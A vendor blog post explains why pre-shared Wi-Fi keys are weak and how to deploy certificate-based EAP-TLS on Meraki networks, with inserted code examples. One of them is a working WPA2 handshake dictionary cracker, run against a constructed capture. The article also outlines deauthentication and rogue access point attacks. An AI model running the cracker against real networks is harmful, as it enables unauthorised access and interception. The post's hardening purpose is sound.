
Meraki EAP-TLS

Written by Ziad Alloush | May 9, 2024 12:22:05 AM




Most users now work from a laptop in many different locations, which means that most of the time they connect their devices to Wi-Fi to get their work done.

The most common way to connect to a Wi-Fi network is through a Pre-Shared Key (PSK). You may know this as the password on the back of your router, scribbled on a Post-it note, or written on the whiteboard at work for everyone to see. A password's strength depends not only on its length and complexity but also on how well it is kept secret.

Bad actors can recover these PSKs quite easily, and one of the tools for doing so is a pineapple. Not the fruit: the Hak5 WiFi Pineapple is a purpose-built wireless auditing device that looks like a home router and costs less than a weekly grocery shop, and penetration testers use it to audit wireless networks. With WPA2-Personal the passphrase itself is never sent over the air, but the four-way handshake a client and access point exchange when the client joins is keyed from it. A device like this captures that handshake (or provokes a fresh one by deauthenticating a client) and the attacker then runs an offline dictionary or brute-force attack until a candidate passphrase reproduces the captured handshake. Once they have your PSK, the same device can stand up a rogue access point with your SSID and conduct man-in-the-middle (MitM) attacks, where your data passes through the bad actor's machine before reaching its destination, giving the attacker access to your information. Of course, if your Wi-Fi password is written somewhere everyone can see it, none of this is required and the attacker can skip straight to the MitM attack.
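The offline attack described above, as an added example that is not part of the original article: with WPA2-Personal the passphrase is never transmitted, but the EAPOL four-way handshake is derived from it (PMK via PBKDF2 over the SSID, then PTK and the message MIC), so anyone holding one captured handshake can test passphrase guesses offline. Every value in the script (SSID, MAC addresses, nonces and the EAPOL frame) is constructed in-script from a known weak passphrase so that it runs without a real capture; in an engagement the same fields come from the pcap.

```python
"""WPA2-Personal offline dictionary attack against a (constructed) four-way handshake."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter).
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    # The first 16 bytes (KCK) key the MIC on EAPOL messages 2 to 4.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): MIC = first 16 bytes of HMAC-SHA1 over the frame
    # with its own MIC field zeroed.
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def recover_psk(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the candidate whose derived KCK reproduces the captured MIC, or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = kck_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(kck, capture["eapol_zeroed"]), capture["mic"]):
            return candidate
    return None


def constructed_capture(passphrase: str = "Summer2024!") -> dict:
    """CONSTRUCTED stand-in for a pcap: a message-2 frame whose MIC was produced from `passphrase`."""
    ssid = "CorpWifi"
    ap_mac = bytes.fromhex("02aabbccdd01")   # constructed, locally administered MACs
    sta_mac = bytes.fromhex("02aabbccdd02")
    anonce = bytes(range(32))                # constructed nonces (real ones are random)
    snonce = bytes(range(32, 64))
    # EAPOL-Key body: descriptor(1, RSN) key-info(2, 0x010a: v2, pairwise, MIC) key-len(2)
    # replay-counter(8) nonce(32) IV(16) RSC(8) ID(8) MIC(16, zeroed) key-data-len(2); key data omitted.
    body = (b"\x02\x01\x0a\x00\x00" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    eapol_zeroed = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type Key
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_zeroed": eapol_zeroed, "mic": eapol_mic(kck, eapol_zeroed)}


if __name__ == "__main__":
    cap = constructed_capture()
    print("recovered PSK:", recover_psk(cap, ["password", "Welcome1", "Summer2024!", "letmein"]))
```

Each guess costs one PBKDF2 run of 4096 iterations, which is cheap on a GPU, so the only defence a PSK has is the entropy of the passphrase and how few people know it. EAP-TLS removes the shared secret altogether: there is nothing in the handshake for a dictionary to recover.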

The alternative, and the gold standard for secure corporate Wi-Fi authentication, is the certificate-based method Extensible Authentication Protocol-Transport Layer Security (EAP-TLS). EAP-TLS uses X.509 certificates installed on both the user devices and the authentication server: the server proves its identity to the device and the device proves its identity to the server, so only a device holding a certificate issued by your CA, together with the matching private key, is allowed onto the wireless network. There is no shared secret to write down, phish or crack. These certificates can be pushed to user machines through the device management tool of your choice, e.g. Intune. Configured correctly, this method requires no user involvement, giving a seamless user journey.




7 Key Benefits of Implementing EAP-TLS In Your Corporate Wi-Fi Network

  1. EAP-TLS is an alternative to password-based authentication that uses digital certificates bound to individual users or devices. A certificate identifies a user or device on the network and is signed by your Certificate Authority (CA), so it cannot be forged without the CA's private key; the authentication server verifies that signature, the validity period and the revocation status before granting access. This gives admins fine-grained control over who and what may connect.
  2. EAP-TLS frees users from memorising and storing complicated passwords: the certificate and its private key live on the device (ideally in a TPM or the OS key store) and the device authenticates automatically.
  3. IT departments save the time currently spent on common password problems such as resets, lockouts and forced rotation.
  4. Administrators control a certificate's validity period, which sets the re-verification cycle, and can revoke a certificate before it expires if a device is lost or decommissioned.
  5. Password reuse is a major security concern in password-based systems, since one leaked password often opens several accounts. With EAP-TLS the credential is a private key that never leaves the device and a certificate that is useful only to the holder of that key; a stolen certificate file on its own cannot be replayed, and there is no password for a user to reuse elsewhere or type into a phishing page. The remaining risk is the private key itself, which is why it should be generated on the device and marked non-exportable. Taking password theft and reuse out of the picture substantially hardens the network.
  6. EAP-TLS is one of the most reliable options when comparing authentication protocols. Note that certificates are signed, not encrypted; the strength comes from the key sizes and algorithms used (for example ECC P-256, or RSA 2048-bit and above) and from running the handshake over TLS 1.2 or 1.3 with legacy versions disabled.
  7. Because the whole exchange runs inside a mutually authenticated TLS tunnel, EAP-TLS is very resistant to eavesdropping, man-in-the-middle attacks and rogue access points: a fake AP cannot present a server certificate the client trusts, so the client never sends anything an attacker can use. The keying material from the TLS handshake is also what the access point and client use to derive the per-session Wi-Fi encryption keys, so each device's traffic is protected with keys no other device on the network shares.




How Can We Achieve This In a Modern Managed Environment with Minimal Hardware Dependencies?

There are numerous ways to incorporate EAP-TLS into your corporate Wi-Fi network. However, at its core, EAP-TLS (like any 802.1X authentication) involves the following three parties:

The Supplicant: the 802.1X client on the user's device, which holds the device certificate and its private key.

The Authenticator: the access point (or switch) the device connects to. It does not make the access decision itself; it relays EAP messages between the supplicant and the authentication server over RADIUS and enforces the server's accept or reject. In a Meraki network this is the Meraki access point.

The Authentication Server: an AAA (Authentication, Authorisation, Accounting) server, e.g. a RADIUS server. It validates the certificate the supplicant presents and decides whether to allow or deny network access.
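The authenticator-to-server leg of the three-party model, as an added example that is not part of the original article: the access point never decides access itself, it wraps each EAP message from the supplicant in a RADIUS Access-Request and sends it to the authentication server, protected by the shared secret the two were configured with. The script builds such a packet for the first step of EAP-TLS (EAP-Response/Identity) and checks it the way a server does, per RFC 2865 framing and the RFC 3579 Message-Authenticator. The shared secret, NAS address and identity are constructed placeholders.

```python
"""RADIUS Access-Request carrying EAP, built as an authenticator would and verified as a server would."""
import hashlib
import hmac
import struct
from typing import List, Tuple

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_NAS_IP_ADDRESS = 4
ATTR_NAS_PORT_TYPE = 61
ATTR_EAP_MESSAGE = 79
ATTR_MESSAGE_AUTHENTICATOR = 80
NAS_PORT_TYPE_WIRELESS_80211 = 19


def attr(attr_type: int, value: bytes) -> bytes:
    # RADIUS attribute TLV: type(1) length(1, includes the 2-byte header) value.
    if len(value) > 253:
        raise ValueError("attribute value too long; split across several attributes")
    return bytes([attr_type, len(value) + 2]) + value


def eap_response_identity(eap_id: int, identity: bytes) -> bytes:
    # EAP packet: code(1, 2=Response) identifier(1) length(2) type(1, 1=Identity) type-data.
    type_data = bytes([1]) + identity
    return struct.pack("!BBH", 2, eap_id, 4 + len(type_data)) + type_data


def build_access_request(secret: bytes, identifier: int, request_authenticator: bytes,
                         user_name: bytes, nas_ip: bytes, eap_packet: bytes) -> bytes:
    """What the AP sends to the RADIUS server for one EAP round trip."""
    attrs = (attr(ATTR_USER_NAME, user_name)
             + attr(ATTR_NAS_IP_ADDRESS, nas_ip)
             + attr(ATTR_NAS_PORT_TYPE, struct.pack("!I", NAS_PORT_TYPE_WIRELESS_80211))
             + attr(ATTR_EAP_MESSAGE, eap_packet))
    # Message-Authenticator = HMAC-MD5(secret, whole packet) with its own 16 bytes zeroed (RFC 3579 s3.2).
    # Mandatory whenever EAP-Message is present; it stops a device that is not a trusted NAS
    # from injecting EAP into the server.
    with_zero = attrs + attr(ATTR_MESSAGE_AUTHENTICATOR, bytes(16))
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(with_zero))
    mac = hmac.new(secret, header + request_authenticator + with_zero, hashlib.md5).digest()
    return header + request_authenticator + attrs + attr(ATTR_MESSAGE_AUTHENTICATOR, mac)


def parse_attrs(data: bytes) -> List[Tuple[int, bytes]]:
    out, i = [], 0
    while i < len(data):
        if len(data) - i < 2:
            raise ValueError("truncated attribute header")
        attr_type, length = data[i], data[i + 1]
        if length < 2 or i + length > len(data):
            raise ValueError("bad attribute length")
        out.append((attr_type, data[i + 2:i + length]))
        i += length
    return out


def verify_message_authenticator(secret: bytes, packet: bytes) -> bool:
    """Server-side check: wrong secret, tampering or a missing Message-Authenticator all fail."""
    if len(packet) < 20:
        return False
    code, _ident, length = struct.unpack("!BBH", packet[:4])
    if code != ACCESS_REQUEST or length != len(packet):
        return False
    try:
        attrs = parse_attrs(packet[20:])
    except ValueError:
        return False
    received, rebuilt = None, b""
    for attr_type, value in attrs:
        if attr_type == ATTR_MESSAGE_AUTHENTICATOR:
            if received is not None or len(value) != 16:
                return False
            received = value
            rebuilt += attr(attr_type, bytes(16))
        else:
            rebuilt += attr(attr_type, value)
    if received is None:
        return False
    expected = hmac.new(secret, packet[:20] + rebuilt, hashlib.md5).digest()
    return hmac.compare_digest(expected, received)


def eap_identity(packet: bytes) -> bytes:
    """Outer identity from EAP-Message; in EAP-TLS the certificate, not this string, is authoritative."""
    eap = b"".join(v for t, v in parse_attrs(packet[20:]) if t == ATTR_EAP_MESSAGE)
    return eap[5:]


if __name__ == "__main__":
    secret, ident = b"constructed-shared-secret", b"host/laptop01.corp.example"
    pkt = build_access_request(secret, 7, bytes(range(16)), ident, bytes([10, 0, 0, 5]),
                               eap_response_identity(1, ident))
    print(len(pkt), "bytes; valid:", verify_message_authenticator(secret, pkt))
```

The same shared secret protects the later rounds, in which the EAP-TLS records (client hello, certificates, finished) ride inside EAP-Message attributes; a mismatched secret between the access point and RADIUSaaS shows up as the server silently dropping these requests.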






1. Meraki Certificate-based Wi-Fi authentication with Systems Manager

This is a pure Meraki solution using features available in the Meraki Dashboard, the web portal used to manage all of your Meraki devices organisation-wide. It eliminates the need for an external AAA server or on-site PKI infrastructure.

To achieve this single-vendor solution, ensure that the access control settings for the SSID in Meraki Dashboard are set to use Meraki Cloud Authentication. This setting provides the authentication and authorisation checks that a traditional EAP-TLS deployment would delegate to your own RADIUS server. Once this has been completed, the only thing left is to create your users in Meraki Dashboard.

Once the Meraki Dashboard configuration has been finalised, we need to enrol the user devices, i.e. the user machines/laptops, in Systems Manager. Enrolment is what places the certificate and the Wi-Fi profile on the device, so only enrolled devices hold a certificate the network will accept, and therefore only allowed users can access the network. Meraki provides two options for device enrolment:

  • Agent enrolment
  • Profile enrolment


Once the Meraki Dashboard configuration and device enrolment have been completed correctly, your environment will be using EAP-TLS for authentication on the wireless network.


2. Meraki Certificate-based Wi-Fi Authentication with SCEPman, Intune and RADIUSaaS

As mentioned previously, to incorporate EAP-TLS into your network you need an authenticator (here, the Meraki access points) and an authentication server, plus a Certificate Authority to issue the device certificates. In this solution we use the following:

SCEPman

SCEPman is a cloud-based CA (Certificate Authority) running in Azure. It issues the device certificates over SCEP (Simple Certificate Enrollment Protocol) to devices enrolled in Intune, and it publishes the CA certificate and revocation information that the authentication server uses to validate those certificates. SCEPman is not the 802.1X authenticator; that role stays with the Meraki access points, which relay the supplicant's EAP messages to the RADIUS server.

RADIUSaaS

RADIUSaaS is a cloud-based AAA (RADIUS) server. It decides whether to allow or deny the supplicant device access to the network based on the certificate the device presents, checking that it chains to the SCEPman CA and, where configured, that it has not been revoked.

Intune

Although not a necessary component of EAP-TLS itself, Intune is the MDM used to manage the endpoint devices. It requests each device's certificate from SCEPman through a SCEP profile, deploys the Wi-Fi profile that tells the device to use EAP-TLS with that certificate, and lets administrators remove or revoke certificates remotely. This is valuable in large organisations with many endpoints.



Now let us look at the configuration steps. The first step is to get SCEPman running in our Azure environment, follow the required configuration steps and download the CA certificate. Once we have this certificate we distribute it to all endpoint devices as a trusted root, which is easily done through Intune or whatever MDM (Mobile Device Management) tool you use in your organisation.

Once the SCEPman configuration is complete, we move on to the cloud-based RADIUS server (RADIUSaaS). Here you add the SCEPman CA certificate created earlier, so that RADIUSaaS trusts the device certificates it will be shown. You then point the Meraki SSID at RADIUSaaS as its RADIUS server (host, port and shared secret) and make sure the Meraki access points, rather than the client devices, can reach it: a client only ever talks to the access point, which relays the EAP exchange over RADIUS.

Now that we have configured the CA and the authentication server, we need to ensure that the relevant certificates (the device certificate issued by SCEPman and the trusted CA certificate) and the EAP-TLS Wi-Fi profile are installed on the end devices. Once again, we use Intune for this task.
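The Meraki side of both designs, as an added example that is not part of the original article or of Cisco Meraki's own tooling: `ssid_cloud_auth()` is the option 1 SSID (Meraki Cloud Authentication), `ssid_external_radius()` is the option 2 SSID pointing at RADIUSaaS, and `lint_ssid()` flags the weak settings a reviewer looks for (PSK, WPA1/TKIP, a missing or weakly secured RADIUS server). Field names and values follow the Meraki Dashboard API v1 endpoint `PUT /networks/{networkId}/wireless/ssids/{number}` as I know it; check them against the current API reference before use. Hostnames, secrets and identifiers below are constructed placeholders.

```python
"""Meraki Dashboard SSID settings for 802.1X, with a lint for weak choices."""
import json
import urllib.request

MERAKI_API = "https://api.meraki.com/api/v1"
RADIUS_AUTH_PORT = 1812  # RFC 2865 default; RADIUSaaS publishes the port to use in its tenant settings


def ssid_cloud_auth(name: str) -> dict:
    """Option 1: Meraki Cloud Authentication, no external RADIUS server."""
    return {
        "name": name,
        "enabled": True,
        "authMode": "8021x-meraki",
        "encryptionMode": "wpa",
        "wpaEncryptionMode": "WPA2 only",
        "splashPage": "None",
    }


def ssid_external_radius(name: str, radius_host: str, radius_secret: str,
                         port: int = RADIUS_AUTH_PORT) -> dict:
    """Option 2: WPA2-Enterprise with the access points forwarding EAP to RADIUSaaS."""
    return {
        "name": name,
        "enabled": True,
        "authMode": "8021x-radius",
        "encryptionMode": "wpa",
        "wpaEncryptionMode": "WPA2 only",
        "radiusServers": [{"host": radius_host, "port": port, "secret": radius_secret}],
        "radiusAccountingEnabled": False,
        "splashPage": "None",
    }


def lint_ssid(cfg: dict) -> list:
    """Return human-readable findings; an empty list means no weak setting was spotted."""
    findings = []
    mode = cfg.get("authMode")
    if mode == "open":
        findings.append("open SSID: no authentication and no encryption")
    elif mode == "psk":
        findings.append("PSK: one shared secret for everyone, recoverable offline from a captured handshake")
        if len(cfg.get("psk", "")) < 20:
            findings.append("PSK shorter than 20 characters")
    if cfg.get("encryptionMode") == "wep":
        findings.append("WEP is broken; use WPA2/WPA3")
    if "WPA1" in cfg.get("wpaEncryptionMode", ""):
        findings.append("WPA1/TKIP permitted; set wpaEncryptionMode to 'WPA2 only' or a WPA3 mode")
    if mode == "8021x-radius":
        servers = cfg.get("radiusServers") or []
        if not servers:
            findings.append("8021x-radius selected but no RADIUS server configured")
        for srv in servers:
            if len(srv.get("secret", "")) < 16:  # RFC 2865 s3 asks for at least 16 octets
                findings.append(f"RADIUS shared secret for {srv.get('host')} is under 16 characters")
    return findings


def put_ssid(api_key: str, network_id: str, number: int, cfg: dict) -> dict:
    """Apply the configuration to Dashboard (needs network access; not exercised offline)."""
    req = urllib.request.Request(
        f"{MERAKI_API}/networks/{network_id}/wireless/ssids/{number}",
        data=json.dumps(cfg).encode(),
        method="PUT",
        headers={"Authorization": f"Bearer {api_key}", "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    legacy = {"name": "Corp-Legacy", "authMode": "psk", "encryptionMode": "wpa",
              "wpaEncryptionMode": "WPA1 and WPA2", "psk": "Welcome1"}
    print("legacy PSK SSID:", lint_ssid(legacy))
    print("EAP-TLS SSID:", lint_ssid(ssid_external_radius("Corp-EAP-TLS", "radius.example.invalid", "x" * 32)))
```

Run the lint against every SSID returned by `GET /networks/{networkId}/wireless/ssids` before and after the change; the legacy PSK network should produce findings and the new 802.1X SSID none. Leave the old SSID disabled rather than deleted until the last device has been enrolled.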

Once all required configurations have been made, you should see EAP-TLS traffic as shown in the image below:


We are a Meraki and SCEPman partner.
Reach out to us for more details and help to get these deployed.